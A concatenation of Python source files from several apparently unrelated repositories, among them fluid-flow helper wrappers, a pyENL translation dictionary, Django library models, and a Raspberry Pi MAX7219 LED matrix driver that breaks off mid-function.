Diameter of pipe, [m]
'''
return comp.P_isothermal_critical_flow(P, fd, D, L)
def fluids_is_critical_flow(P1, P2, k):
'''
Determines if a flow of a fluid driven by pressure gradient P1 - P2 is
critical, for a fluid with the given isentropic coefficient. This function
calculates critical flow pressure, and checks if this is larger than P2.
If so, the flow is critical and choked.
'''
return comp.is_critical_flow(P1, P2, k)
def fluids_stagnation_energy(V):
'''
Calculates the increase in enthalpy dH which is provided by a fluid’s velocity V.
Parameters:
V : float
Velocity [m/s]
Returns:
dH : float
Incease in enthalpy [J/kg]
'''
return comp.stagnation_energy(V)
def fluids_P_stagnation(P, T, Tst, k):
'''
Calculates stagnation flow pressure Pst for a fluid with the given
isentropic coefficient and specified stagnation temperature and normal
temperature. Normally used with converging/diverging nozzles.
Parameters:
P : float
Normal pressure of a fluid [Pa]
T : float
Normal temperature of a fluid [K]
Tst : float
Stagnation temperature of a fluid moving at a certain velocity [K]
k : float
Isentropic coefficient []
Returns:
Pst : float
Stagnation pressure of a fluid moving at a certain velocity [Pa]
'''
return fluids_P_stagnation(P, T, Tst, k)
def fluids_T_stagnation(T, P, Pst, k):
'''
Calculates stagnation flow temperature Tst for a fluid with the given
isentropic coefficient and specified stagnation pressure and normal
pressure. Normally used with converging/diverging nozzles.
Parameters:
T : float
Normal temperature of a fluid [K]
P : float
Normal pressure of a fluid [Pa]
Pst : float
Stagnation pressure of a fluid moving at a certain velocity [Pa]
k : float
Isentropic coefficient []
Returns:
Tst : float
Stagnation temperature of a fluid moving at a certain velocity [K]
'''
return comp.T_stagnation(T, P, Pst, k)
def fluids_T_stagnation_ideal(T, V, Cp):
'''
Calculates the ideal stagnation temperature Tst calculated assuming the
fluid has a constant heat capacity Cp and with a specified velocity V and
tempeature T.
Parameters:
T : float
Tempearture [K]
V : float
Velocity [m/s]
Cp : float
Ideal heat capacity [J/kg/K]
Returns:
Tst : float
Stagnation temperature [J/kg]
'''
return comp.T_stagnation_ideal(T, V, Cp)
```
#### File: jon85p/pyENL/translations.py
```python
def translations(lang='en'):
'''
Devuelve un diccionario con las traducciones de cada string.
'''
dicc_gen = {}
# Por cada opción de texto a mostrar al usuario agregar una entrada al
# diccionario general; cada valor de diccionario será otro diccionario donde
# las claves son los códigos de los idiomas y los valores son las
# correspondientes traducciones.
# TODO: Traducción de excepciones
idiomas = ['es', 'en', 'pt', 'fr']
if lang not in idiomas:
raise Exception('Idioma no listado, verificar opciones.')
dicc_gen['Resolver'] = {'es': 'Resolver', 'en': 'Solve', 'pt': 'Resolver',
'fr': 'Resolver'}
dicc_gen['Ecuaciones'] = {'es': 'Ecuaciones', 'en': 'Equations',
'pt': 'Ecuaciones', 'fr': 'Ecuaciones'}
dicc_gen['Actualizar'] = {'es': 'Actualizar', 'en': 'Update',
'pt': 'Actualizar', 'fr': 'Actualizar'}
dicc_gen['Limpiar'] = {'es': 'Limpiar', 'en': 'Clear', 'pt': 'Limpiar',
'fr': 'Limpiar'}
dicc_gen['Variables'] = {'es': 'Variables', 'en': 'Variables',
'pt': 'Variables', 'fr': 'Variables'}
dicc_gen['Información'] = {'es': 'Información', 'en': 'Information',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Soluciones'] = {'es': 'Soluciones', 'en': 'Solutions',
'pt': 'Soluciones', 'fr': 'Soluciones'}
dicc_gen['Residuos'] = {'es': 'Residuos', 'en': 'Residual',
'pt': 'Residuos', 'fr': 'Residuos'}
dicc_gen['x Ecuaciones/y Variables'] = {'es': 'x Ecuaciones/y Variables', 'en': 'x Ecuaciones/y Variables',
'pt': 'x Ecuaciones/y Variables', 'fr': 'x Ecuaciones/y Variables'}
dicc_gen['Archivo'] = {'es': 'Archivo', 'en': 'File',
'pt': 'Archivo', 'fr': 'Archivo'}
dicc_gen['Exportar reporte'] = {'es': 'Exportar reporte', 'en': 'Export report',
'pt': 'Exportar reporte', 'fr': 'Exportar reporte'}
dicc_gen['Importar'] = {'es': 'Importar', 'en': 'Import',
'pt': 'Importar', 'fr': 'Importar'}
dicc_gen['Editar'] = {'es': 'Editar', 'en': 'Edit',
'pt': 'Editar', 'fr': 'Editar'}
dicc_gen['Opciones'] = {'es': 'Opciones', 'en': 'Options',
'pt': 'Opciones', 'fr': 'Opciones'}
dicc_gen['Herramientas'] = {'es': 'Herramientas', 'en': 'Tools',
'pt': 'Herramientas', 'fr': 'Herramientas'}
dicc_gen['Funciones Ingeniería'] = {'es': 'Funciones Ingeniería', 'en': 'Engineering Functions',
'pt': 'Funciones Ingeniería', 'fr': 'Funciones Ingeniería'}
dicc_gen['Funciones de usuario'] = {'es': 'Funciones de usuario', 'en': 'User functions',
'pt': 'Funciones de usuario', 'fr': 'Funciones de usuario'}
dicc_gen['Ayuda'] = {'es': 'Ayuda', 'en': 'Help',
'pt': 'Ayuda', 'fr': 'Ayuda'}
dicc_gen['Abrir'] = {'es': 'Abrir', 'en': 'Open',
'pt': 'Abrir', 'fr': 'Abrir'}
dicc_gen['Guardar'] = {'es': 'Guardar', 'en': 'Save',
'pt': 'Guardar', 'fr': 'Guardar'}
dicc_gen['Guardar Como...'] = {'es': 'Guardar Como...', 'en': 'Save as...',
'pt': 'Guardar Como...', 'fr': 'Guardar Como...'}
dicc_gen['Cerrar'] = {'es': 'Cerrar', 'en': 'Close',
'pt': 'Cerrar', 'fr': 'Cerrar'}
dicc_gen['Salir'] = {'es': 'Salir', 'en': 'Exit',
'pt': 'Salir', 'fr': 'Salir'}
dicc_gen['Seleccionar todo'] = {'es': 'Seleccionar todo', 'en': 'Select all',
'pt': 'Seleccionar todo', 'fr': 'Seleccionar todo'}
dicc_gen['Deshacer'] = {'es': 'Deshacer', 'en': 'Undo',
'pt': 'Deshacer', 'fr': 'Deshacer'}
dicc_gen['Rehacer'] = {'es': 'Rehacer', 'en': 'Redo',
'pt': 'Rehacer', 'fr': 'Rehacer'}
dicc_gen['Copiar'] = {'es': 'Copiar', 'en': 'Copy',
'pt': 'Copiar', 'fr': 'Copiar'}
dicc_gen['Cortar'] = {'es': 'Cortar', 'en': 'Cut',
'pt': 'Cortar', 'fr': 'Cortar'}
dicc_gen['Pegar'] = {'es': 'Pegar', 'en': 'Paste',
'pt': 'Pegar', 'fr': 'Pegar'}
dicc_gen['Ayuda pyENL'] = {'es': 'Ayuda pyENL', 'en': 'pyENL Help',
'pt': 'Ayuda pyENL', 'fr': 'Ayuda pyENL'}
dicc_gen['Ayuda NumPy'] = {'es': 'Ayuda NumPy', 'en': 'NumPy Help',
'pt': 'Ayuda NumPy', 'fr': 'Ayuda NumPy'}
dicc_gen['Ayuda CoolProp'] = {'es': 'Ayuda CoolProp', 'en': 'CoolProp Help',
'pt': 'Ayuda CoolProp', 'fr': 'Ayuda CoolProp'}
dicc_gen['Sobre pyENL'] = {'es': 'Sobre pyENL', 'en': 'About pyENL',
'pt': 'Sobre pyENL', 'fr': 'Sobre pyENL'}
dicc_gen['Licencias'] = {'es': 'Licencias', 'en': 'Licences',
'pt': 'Licencias', 'fr': 'Licencias'}
dicc_gen['Termodinámicas'] = {'es': 'Termodinámicas', 'en': 'Thermodynamical',
'pt': 'Termodinámicas', 'fr': 'Termodinámicas'}
dicc_gen['Por agregar...'] = {'es': 'Por agregar...', 'en': 'TODO',
'pt': 'Por agregar...', 'fr': 'Por agregar...'}
dicc_gen['Disponibles'] = {'es': 'Disponibles', 'en': 'Availables',
'pt': 'Disponibles', 'fr': 'Disponibles'}
dicc_gen['Agregar...'] = {'es': 'Agregar...', 'en': 'TODO...',
'pt': 'Agregar...', 'fr': 'Agregar...'}
dicc_gen['Comentario'] = {'es': 'Comentario', 'en': 'Comment',
'pt': 'Comentario', 'fr': 'Comentario'}
dicc_gen['Unidades'] = {'es': 'Unidades', 'en': 'Units',
'pt': 'Unidades', 'fr': 'Unidades'}
dicc_gen['Configuración'] = {'es': 'Configuración', 'en': 'Settings',
'pt': 'Configuración', 'fr': 'Configuración'}
dicc_gen['Imprimir'] = {'es': 'Imprimir', 'en': 'Print',
'pt': 'Imprimir', 'fr': 'Imprimir'}
dicc_gen['Open Document Text'] = {'es': 'Open Document Text', 'en': 'Open Document Text',
'pt': 'Open Document Text', 'fr': 'Open Document Text'}
dicc_gen['Archivo LaTeX'] = {'es': 'Archivo LaTeX', 'en': 'LaTeX file',
'pt': 'Archivo LaTeX', 'fr': 'Archivo LaTeX'}
dicc_gen['Archivo EES'] = {'es': 'Archivo EES', 'en': 'EES file',
'pt': 'Archivo EES', 'fr': 'Archivo EES'}
dicc_gen['Información'] = {'es': 'Información', 'en': 'Information',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Solucionado en '] = {'es': 'Solucionado en ', 'en': 'Solved in ',
'pt': 'Información', 'fr': 'Información'}
dicc_gen[' segundos.\nMayor desviación de '] = {'es': ' segundos.\nMayor desviación de ', 'en': ' seconds.\nGreater Desviation: ',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Ecuación'] = {'es': 'Ecuación', 'en': 'Equation',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Residuo'] = {'es': 'Residuo', 'en': 'Residual',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Solución'] = {'es': 'Solución', 'en': 'Solution',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['No hubo convergencia a solución...'] = {'es': 'No hubo convergencia a solución...',
'en': 'No convergence to solution...',
'pt': 'No hubo convergencia a solución...',
'fr': 'No hubo convergencia a solución...'}
dicc_gen['Problema'] = {'es': 'Problema', 'en': 'Problem',
'pt': 'Problema', 'fr': 'Problema'}
dicc_gen['Variable'] = {'es': 'Variable', 'en': 'Variable',
'pt': 'Variable', 'fr': 'Variable'}
dicc_gen['Valor Inicial'] = {'es': 'Valor Inicial', 'en': 'Initial Guess',
'pt': 'Valor Inicial', 'fr': 'Valor Inicial'}
dicc_gen['Inferior'] = {'es': 'Inferior', 'en': 'Lower',
'pt': 'Inferior', 'fr': 'Inferior'}
dicc_gen['Superior'] = {'es': 'Superior', 'en': 'Upper',
'pt': 'Superior', 'fr': 'Superior'}
dicc_gen['El número '] = {'es': 'El número ', 'en': 'The number ',
'pt': 'El número ', 'fr': 'El número '}
dicc_gen[' es mayor a '] = {'es': ' es mayor a ', 'en': 'is greater than ',
'pt': ' es mayor a ', 'fr': ' es mayor a '}
dicc_gen[' en la variable '] = {'es': ' en la variable ', 'en': ' in variable ',
'pt': ' en la variable ', 'fr': ' en la variable '}
dicc_gen['El valor inicial de '] = {'es': 'El valor inicial de ', 'en': 'The initial guess of ',
'pt': 'El valor inicial de ', 'fr': 'El valor inicial de '}
dicc_gen[' debe estar entre los dos límites.'] = {'es': ' debe estar entre los dos límites.',
'en': ' must is between the limits.',
'pt': ' debe estar entre los dos límites.', 'fr': ' debe estar entre los dos límites.'}
dicc_gen[' ecuaciones / '] = {'es': ' ecuaciones / ', 'en': ' equations /',
'pt': ' ecuaciones / ', 'fr': ' ecuaciones / '}
dicc_gen[' variables'] = {'es': ' variables', 'en': ' variables',
'pt': ' variables', 'fr': ' variables'}
dicc_gen['Error encontrando cantidad de variables y de ecuaciones'] = {'es': 'Error encontrando cantidad de variables y de ecuaciones',
'en': 'Error finding variable lenght and equations',
'pt': 'Error encontrando cantidad de variables y de ecuaciones',
'fr': 'Error encontrando cantidad de variables y de ecuaciones'}
dicc_gen["x Ecuaciones/y Variables"] = {'es': "x Ecuaciones/y Variables", 'en': 'x Equations/y Variables',
'pt': "x Ecuaciones/y Variables", 'fr': "x Ecuaciones/y Variables"}
dicc_gen['Información'] = {'es': 'Información', 'en': 'Information',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Información'] = {'es': 'Información', 'en': 'Information',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Información'] = {'es': 'Información', 'en': 'Information',
'pt': 'Información', 'fr': 'Información'}
dicc_gen['Acá va el comentario'] = {'es': 'Acá va el comentario', 'en': 'Comment goes here',
'pt': 'Acá va el comentario', 'fr': 'Acá va el comentario'}
dicc_gen['El documento se ha modificado'] = {'es' : 'El documento se ha modificado',
'en': 'The file was modified',
'pt': 'El archivo ha sido modificado',
'fr': 'El archivo ha sido modificado'}
dicc_gen["¿Desea guardar los cambios?"] = {'es' : '¿Desea guardar los cambios?',
'en': 'Save changes?',
'pt': '¿Desea guardar los cambios?',
'fr': '¿Desea guardar los cambios?'}
dicc_gen["Idioma (requiere reiniciar pyENL)"] = {'es' : "Idioma (requiere reiniciar pyENL)",
'en': 'Language (pyENL restart)',
'pt': '"Idioma (requiere reiniciar pyENL)"',
'fr': '"Idioma (requiere reiniciar pyENL)"'}
dicc_gen['Spanish'] = {'es' : 'Español', 'en': 'Spanish',
'pt': 'Espanhol', 'fr': 'Español'}
dicc_gen['English'] = {'es' : 'Inglés', 'en': 'English',
'pt': 'Inglês', 'fr': 'Anglais'}
dicc_gen['French'] = {'es' : 'Francés', 'en': 'French',
'pt': 'Francês', 'fr': 'Français'}
dicc_gen['Portuguese'] = {'es' : 'Portugués', 'en': 'Portiguese',
'pt': 'Portugues', 'fr': 'Portugais'}
dicc_gen['Formato'] = {'es' : 'Formato', 'en': 'Format',
'pt': 'Format', 'fr': 'Format'}
dicc_gen['Interfaz'] = {'es' : 'Interfaz', 'en': 'Interface',
'pt': 'Interface', 'fr': 'Interface'}
dicc_gen['Método'] = {'es' : 'Método', 'en': 'Method',
'pt': 'Method', 'fr': 'Method'}
dicc_gen['Formato'] = {'es' : 'Formato', 'en': 'Format',
'pt': 'Format', 'fr': 'Format'}
dicc_gen['Tolerancia'] = {'es' : 'Tolerancia', 'en': 'Tolerance',
'pt': 'Tolerance', 'fr': 'Tolerance'}
dicc_gen['Tiempo máximo de espera en segundos'] = {'es' : 'Tiempo máximo de espera (segundos)', 'en': 'Timeout (seconds)',
'pt': 'Timeout (seconds)', 'fr': 'Timeout (seconds)'}
dicc_gen['Solver'] = {'es' : 'Solucionador', 'en': 'Solver',
'pt': 'Solver', 'fr': 'Solver'}
dicc_gen['Unidades'] = {'es' : 'Unidades', 'en': 'Units',
'pt': 'Units', 'fr': 'Units'}
dicc_gen['Tema'] = {'es' : 'Tema', 'en': 'Theme',
'pt': 'Theme', 'fr': 'Theme'}
dicc_gen['Predeterminado'] = {'es' : 'Predeterminado', 'en': 'Default',
'pt': 'Default', 'fr': 'Default'}
dicc_gen['Fuente'] = {'es' : 'Fuente', 'en': 'Font',
'pt': 'Font', 'fr': 'Font'}
# dicc_gen['Algo'] = {'es' : 'Algo', 'en': 'Something',
# 'pt': 'Alginho', 'fr': 'Algué'}
# Salida de la función
output = {}
for clave in list(dicc_gen.keys()):
output[clave] = (dicc_gen[clave])[lang]
return output
``` |
{
"source": "jona04/libjonatas",
"score": 3
} |
#### File: libjonatas/libjonatas/github_api.py
```python
import requests
def buscar_avatar(usuario):
"""
Busca avatar de um usuario no github
:param usuario: str com o nome do usuario
:return: str com o link do avatar
"""
url = f'https://api.github.com/users/jona04'
resp = requests.get(url)
return resp.json()['avatar_url']
```
#### File: libjonatas/spam/db.py
```python
from time import sleep
class Sessao():
contador = 0
usuarios = []
def salvar(self, usuario):
Sessao.contador += 1
usuario.id = Sessao.contador
self.usuarios.append(usuario)
def listar(self):
return self.usuarios
def roll_back(self):
self.usuarios.clear()
def fechar(self):
pass
class Conexao():
def __init__(self):
sleep(1)
def gerar_sessao(self):
return Sessao()
def fechar(self):
pass
``` |
{
"source": "jona04/work-at-olist",
"score": 2
} |
#### File: work-at-olist/library/models.py
```python
from django.db import models
class Author(models.Model):
name = models.CharField('Name', max_length=32)
created_at = models.DateTimeField('Created at', auto_now_add=True, null=True)
uploaded_at = models.DateTimeField('Updated at', auto_now=True, null=True)
def __str__(self):
return self.name
class Meta:
verbose_name = "Author"
verbose_name_plural = "Authors"
ordering = ['-created_at']
class Book(models.Model):
name = models.CharField('Name', max_length=32)
edition = models.IntegerField('Edition')
publication_year = models.IntegerField('Publication Year')
authors = models.ManyToManyField(Author, through='GroupBookAuthor')
created_at = models.DateTimeField('Created at', auto_now_add=True, null=True)
uploaded_at = models.DateTimeField('Updated at', auto_now=True, null=True)
def __str__(self):
return self.name
class Meta:
verbose_name = "Book"
verbose_name_plural = "Books"
ordering = ['-created_at']
class GroupBookAuthor(models.Model):
author = models.ForeignKey(Author, on_delete=models.PROTECT, null=True)
book = models.ForeignKey(Book, on_delete=models.PROTECT, null=True)
def __str__(self):
return str(self.book)
class Meta:
verbose_name = "Group Book Author"
verbose_name_plural = "Group Book Author s"
``` |
{
"source": "JonA1961/MAX7219array",
"score": 3
} |
#### File: JonA1961/MAX7219array/MAX7219array.py
```python
import spidev
import time
from random import randrange
# Note: If any additional fonts are added in MAX7219fonts.py, add them to the import list here:
# Also add them to the section at the end of this script that parses command line arguments
from MAX7219fonts import CP437_FONT, SINCLAIRS_FONT, LCD_FONT, TINY_FONT
# IMPORTANT: User must specify the number of MAX7219 matrices here:
NUM_MATRICES = 8 # Number of separate MAX7219 matrices
# Optional: It is also possible to change the default font for all the library functions:
DEFAULT_FONT = CP437_FONT # Note: some fonts only contain characters in chr(32)-chr(126) range
# ---------------------------------------------------------
# Should not need to change anything below here
# ---------------------------------------------------------
PAD_STRING = " " * NUM_MATRICES # String for trimming text to fit
NO_OP = [0,0] # 'No operation' tuple: 0x00 sent to register MAX_7219_NOOP
MATRICES = range(NUM_MATRICES) # List of available matrices for validation
# Graphics setup
gfx_buffer = []
gfx_rows = range(8)
gfx_columns = range(NUM_MATRICES * 8)
for gfx_col in gfx_columns:
gfx_buffer += [0]
# Registers in the MAX7219 matrix controller (see datasheet)
MAX7219_REG_NOOP = 0x0
MAX7219_REG_DIGIT0 = 0x1
MAX7219_REG_DIGIT1 = 0x2
MAX7219_REG_DIGIT2 = 0x3
MAX7219_REG_DIGIT3 = 0x4
MAX7219_REG_DIGIT4 = 0x5
MAX7219_REG_DIGIT5 = 0x6
MAX7219_REG_DIGIT6 = 0x7
MAX7219_REG_DIGIT7 = 0x8
MAX7219_REG_DECODEMODE = 0x9
MAX7219_REG_INTENSITY = 0xA
MAX7219_REG_SCANLIMIT = 0xB
MAX7219_REG_SHUTDOWN = 0xC
MAX7219_REG_DISPLAYTEST = 0xF
# Scroll & wipe directions, for use as arguments to various library functions
# For ease of use, import the following constants into the main script
DIR_U = 1 # Up
DIR_R = 2 # Right
DIR_D = 4 # Down
DIR_L = 8 # Left
DIR_RU = 3 # Right & up diagonal scrolling for gfx_scroll() function only
DIR_RD = 6 # Right & down diagonal scrolling for gfx_scroll() function only
DIR_LU = 9 # Left & up diagonal scrolling for gfx_scroll() function only
DIR_LD = 12 # Left & down diagonal scrolling for gfx_scroll() function only
DISSOLVE = 16 # Pseudo-random fade transition for wipe_message() function only
GFX_OFF = 0 # Turn the relevant LEDs off, or omit (don't draw) the endpoint of a line
GFX_ON = 1 # Turn the relevant LEDs on, or include (draw) the endpoint of a line
GFX_INVERT = 2 # Invert the state of the relevant LEDs
# Open SPI bus#0 using CS0 (CE0)
spi = spidev.SpiDev()
spi.open(0,0)
# ---------------------------------------
# Library function definitions begin here
# ---------------------------------------
def send_reg_byte(register, data):
# Send one byte of data to one register via SPI port, then raise CS to latch
# Note that subsequent sends will cycle this tuple through to successive MAX7219 chips
spi.xfer([register, data])
def send_bytes(datalist):
# Send sequence of bytes (should be [register,data] tuples) via SPI port, then raise CS
# Included for ease of remembering the syntax rather than the native spidev command, but also to avoid reassigning to 'datalist' argument
spi.xfer2(datalist[:])
def send_matrix_reg_byte(matrix, register, data):
# Send one byte of data to one register in just one MAX7219 without affecting others
if matrix in MATRICES:
padded_data = NO_OP * (NUM_MATRICES - 1 - matrix) + [register, data] + NO_OP * matrix
send_bytes(padded_data)
def send_all_reg_byte(register, data):
# Send the same byte of data to the same register in all of the MAX7219 chips
send_bytes([register, data] * NUM_MATRICES)
def clear(matrix_list):
# Clear one or more specified MAX7219 matrices (argument(s) to be specified as a list even if just one)
for matrix in matrix_list:
if matrix in MATRICES:
for col in range(8):
send_matrix_reg_byte(matrix, col+1, 0)
def clear_all():
# Clear all of the connected MAX7219 matrices
for col in range(8):
send_all_reg_byte(col+1, 0)
def brightness(intensity):
# Set a specified brightness level on all of the connected MAX7219 matrices
# Intensity: 0-15 with 0=dimmest, 15=brightest; in practice the full range does not represent a large difference
intensity = int(max(0, min(15, intensity)))
send_bytes([MAX7219_REG_INTENSITY, intensity] * NUM_MATRICES)
def send_matrix_letter(matrix, char_code, font=DEFAULT_FONT):
# Send one character from the specified font to a specified MAX7219 matrix
if matrix in MATRICES:
for col in range(8):
send_matrix_reg_byte(matrix, col+1, font[char_code % 0x100][col])
def send_matrix_shifted_letter(matrix, curr_code, next_code, progress, direction=DIR_L, font=DEFAULT_FONT):
# Send to one MAX7219 matrix a combination of two specified characters, representing a partially-scrolled position
# progress: 0-7: how many pixels the characters are shifted: 0=curr_code fully displayed; 7=one pixel less than fully shifted to next_code
# With multiple matrices, this function sends many NO_OP tuples, limiting the scrolling speed achievable for a whole line
# scroll_message_horiz() and scroll_message_vert() are more efficient and can scroll a whole line of text faster
curr_char = font[curr_code % 0x100]
next_char = font[next_code % 0x100]
show_char = [0,0,0,0,0,0,0,0]
progress = progress % 8
if matrix in MATRICES:
if direction == DIR_L:
for col in range(8):
if col+progress < 8:
show_char[col] = curr_char[col+progress]
else:
show_char[col] = next_char[col+progress-8]
send_matrix_reg_byte(matrix, col+1, show_char[col])
elif direction == DIR_R:
for col in range(8):
if col >= progress:
show_char[col] = curr_char[col-progress]
else:
show_char[col] = next_char[col-progress+8]
send_matrix_reg_byte(matrix, col+1, show_char[col])
elif direction == DIR_U:
for col in range(8):
show_char[col] = (curr_char[col] >> progress) + (next_char[col] << (8-progress))
send_matrix_reg_byte(matrix, col+1, show_char[col])
elif direction == DIR_D:
for col in range(8):
show_char[col] = (curr_char[col] << progress) + (next_char[col] >> (8-progress))
send_matrix_reg_byte(matrix, col+1, show_char[col])
def static_message(message, font=DEFAULT_FONT):
# Send a stationary text message to the array of MAX7219 matrices
# Message will be truncated from the right to fit the array
message = trim(message)
for matrix in range(NUM_MATRICES-1, -1, -1):
send_matrix_letter(matrix, ord(message[NUM_MATRICES - matrix - 1]), font)
def scroll_message_horiz(message, repeats=0, speed=3, direction=DIR_L, font=DEFAULT_FONT, finish=True):
# Scroll a text message across the array, for a specified (repeats) number of times
# repeats=0 gives indefinite scrolling until script is interrupted
# speed: 0-9 for practical purposes; speed does not have to integral
# direction: DIR_L or DIR_R only; DIR_U & DIR_D will do nothing
# finish: True/False - True ensures array is clear at end, False ends with the last column of the last character of message
# still displayed on the array - this is included for completeness but rarely likely to be required in practice
# Scrolling starts with message off the RHS(DIR_L)/LHS(DIR_R) of array, and ends with message off the LHS/RHS
# If repeats>1, add space(s) at end of 'message' to separate the end of message & start of its repeat
delay = 0.5 ** speed
if repeats <= 0:
indef = True
else:
indef = False
repeats = int(repeats)
if len(message) < NUM_MATRICES:
message = trim(message)
# Repeatedly scroll the whole message (initially 'front-padded' with blanks) until the last char appears
scroll_text = ""
if direction == DIR_L:
scroll_text = PAD_STRING + message
elif direction == DIR_R:
scroll_text = message + PAD_STRING
counter = repeats
while (counter > 0) or indef:
scroll_text_once(scroll_text, delay, direction, font)
# After the first scroll, replace the blank 'front-padding' with the start of the same message
if counter == repeats:
if direction == DIR_L:
scroll_text = message[-NUM_MATRICES:] + message
elif direction == DIR_R:
scroll_text = message + message[:NUM_MATRICES]
counter -= 1
# To finish, 'end-pad' the message with blanks and scroll the end of the message off the array
if direction == DIR_L:
scroll_text = message[-NUM_MATRICES:] + PAD_STRING
elif direction == DIR_R:
scroll_text = PAD_STRING + message[:NUM_MATRICES]
scroll_text_once(scroll_text, delay, direction, font)
# Above algorithm leaves the last column of the last character displayed on the array, so optionally erase it
if finish:
clear_all()
def scroll_text_once(text, delay, direction, font):
# Subroutine used by scroll_message_horiz(), scrolls text once across the array, starting & ending with test on the array
# Not intended to be used as a user routine; if used, note different syntax: compulsory arguments & requires delay rather than speed
length = len(text) - NUM_MATRICES
start_range = []
if direction == DIR_L:
start_range = range(length)
elif direction == DIR_R:
start_range = range(length-1, -1, -1)
for start_char in start_range:
for stage in range(8):
for col in range(8):
column_data = []
for matrix in range(NUM_MATRICES-1, -1, -1):
if direction == DIR_L:
this_char = font[ord(text[start_char + NUM_MATRICES - matrix - 1])]
next_char = font[ord(text[start_char + NUM_MATRICES - matrix])]
if col+stage < 8:
column_data += [col+1, this_char[col+stage]]
else:
column_data += [col+1, next_char[col+stage-8]]
elif direction == DIR_R:
this_char = font[ord(text[start_char + NUM_MATRICES - matrix])]
next_char = font[ord(text[start_char + NUM_MATRICES - matrix - 1])]
if col >= stage:
column_data += [col+1, this_char[col-stage]]
else:
column_data += [col+1, next_char[col-stage+8]]
send_bytes(column_data)
time.sleep(delay)
def scroll_message_vert(old_message, new_message, speed=3, direction=DIR_U, font=DEFAULT_FONT, finish=True):
# Transitions vertically between two different (truncated if necessary) text messages
# speed: 0-9 for practical purposes; speed does not have to integral
# direction: DIR_U or DIR_D only; DIR_L & DIR_R will do nothing
# finish: True/False : True completely displays new_message at end, False leaves the transition one pixel short
# False should be used to ensure smooth scrolling if another vertical scroll is to follow immediately
delay = 0.5 ** speed
old_message = trim(old_message)
new_message = trim(new_message)
for stage in range(8):
for col in range(8):
column_data=[]
for matrix in range(NUM_MATRICES-1, -1, -1):
this_char = font[ord(old_message[NUM_MATRICES - matrix - 1])]
next_char = font[ord(new_message[NUM_MATRICES - matrix - 1])]
scrolled_char = [0,0,0,0,0,0,0,0]
if direction == DIR_U:
scrolled_char[col] = (this_char[col] >> stage) + (next_char[col] << (8-stage))
elif direction == DIR_D:
scrolled_char[col] = (this_char[col] << stage) + (next_char[col] >> (8-stage))
column_data += [col+1, scrolled_char[col]]
send_bytes(column_data)
time.sleep(delay)
# above algorithm finishes one shift before fully displaying new_message, so optionally complete the display
if finish:
static_message(new_message)
def wipe_message(old_message, new_message, speed=3, transition=DISSOLVE, font=DEFAULT_FONT):
# Transition from one message (truncated if necessary) to another by a 'wipe' or 'dissolve'
# speed: 0-9 for practical purposes; speed does not have to integral
# transition: WIPE_U, WIPE_D, WIPE_L, WIPE_R, WIPE RU, WIPE_RD, WIPE_LU, WIPE_LD to wipe each letter simultaneously
# in the respective direction (the diagonal directions do not give a true corner-to-corner 'wipe' effect)
# or transition: DISSOLVE for a pseudo-random dissolve from old_message to new_message
delay = 0.5 ** speed
old_message = trim(old_message)
new_message = trim(new_message)
old_data = [ [], [], [], [], [], [], [], [] ]
new_data = [ [], [], [], [], [], [], [], [] ]
pixel = [ [], [], [], [], [], [], [], [] ]
stage_range = range(8)
col_range = range(8)
for col in range(8):
for letter in range(NUM_MATRICES):
old_data[col] += [col+1] + [font[ord(old_message[letter])][col]]
new_data[col] += [col+1] + [font[ord(new_message[letter])][col]]
if transition == DISSOLVE:
pixel[col] += [randrange(8)]
elif transition == DIR_D:
pixel[col] += [0]
elif transition == DIR_U:
pixel[col] += [7]
elif transition == DIR_RU or transition == DIR_LD:
pixel[col] += [col]
elif transition == DIR_RD or transition == DIR_LU:
pixel[col] += [7-col]
elif transition == DIR_L:
col_range = range(7, -1, -1)
stage_range = [0]
elif transition == DIR_R:
stage_range = [0]
for stage in stage_range:
for col in col_range:
if transition == DIR_L or transition == DIR_R:
old_data[col]=new_data[col][:]
else:
for letter in range(NUM_MATRICES):
mask = (0x01 << pixel[col][letter])
old_data[col][2*letter+1] = old_data[col][2*letter+1] & ~mask | new_data[col][2*letter+1] & mask
if transition == DISSOLVE:
pixel_jump = 3
elif transition & DIR_D:
pixel_jump = 1
elif transition & DIR_U:
pixel_jump = 7
pixel[col][letter] = (pixel[col][letter] + pixel_jump)%8
send_bytes(old_data[col])
if transition == DIR_L or transition == DIR_R:
time.sleep(delay)
time.sleep(delay)
def trim(text):
# Trim or pad specified text to the length of the MAX7219 array
text += PAD_STRING
text = text[:NUM_MATRICES]
return text
def gfx_set_px(g_x, g_y, state=GFX_INVERT):
# Set an individual pixel in the graphics buffer to on, off, or the inverse of its previous state
if (g_x in gfx_columns) and (g_y in gfx_rows):
if state == GFX_ON:
gfx_buffer[g_x] = gfx_buffer[g_x] | (0x01 << g_y)
elif state == GFX_OFF:
gfx_buffer[g_x] = (gfx_buffer[g_x] & ~(0x01 << g_y)) & 0xFF
elif state == GFX_INVERT:
gfx_buffer[g_x] = (gfx_buffer[g_x] ^ (0x01 << g_y)) & 0xFF
def gfx_set_col(g_col, state=GFX_INVERT):
# Set an entire column in the graphics buffer to on, off, or the inverse of its previous state
if (g_col in gfx_columns):
if state == GFX_ON:
gfx_buffer[g_col] = 0xFF
elif state == GFX_OFF:
gfx_buffer[g_col] = 0x00
elif state == GFX_INVERT:
gfx_buffer[g_col] = (~gfx_buffer[g_col]) & 0xFF
def gfx_set_all(state=GFX_INVERT):
# Set the entire graphics buffer to on, off, or the inverse of its previous state
for g_col in gfx_columns:
if state == GFX_ON:
gfx_buffer[g_col] = 0xFF
elif state == GFX_OFF:
gfx_buffer[g_col] = 0x00
elif state == GFX_INVERT:
gfx_buffer[g_col] = (~gfx_buffer[g_col]) & 0xFF
def gfx_line(start_x, start_y, end_x, end_y, state=GFX_INVERT, incl_endpoint=GFX_ON):
# Draw a staright line in the graphics buffer between the specified start- & end-points
# The line can be drawn by setting each affected pixel to either on, off, or the inverse of its previous state
# The final point of the line (end_x, end_y) can either be included (default) or omitted
# It can be usefully omitted if drawing another line starting from this previous endpoint using GFX_INVERT
start_x, end_x = int(start_x), int(end_x)
start_y, end_y = int(start_y), int(end_y)
len_x = end_x - start_x
len_y = end_y - start_y
if abs(len_x) + abs(len_y) == 0:
if incl_endpoint == GFX_ON:
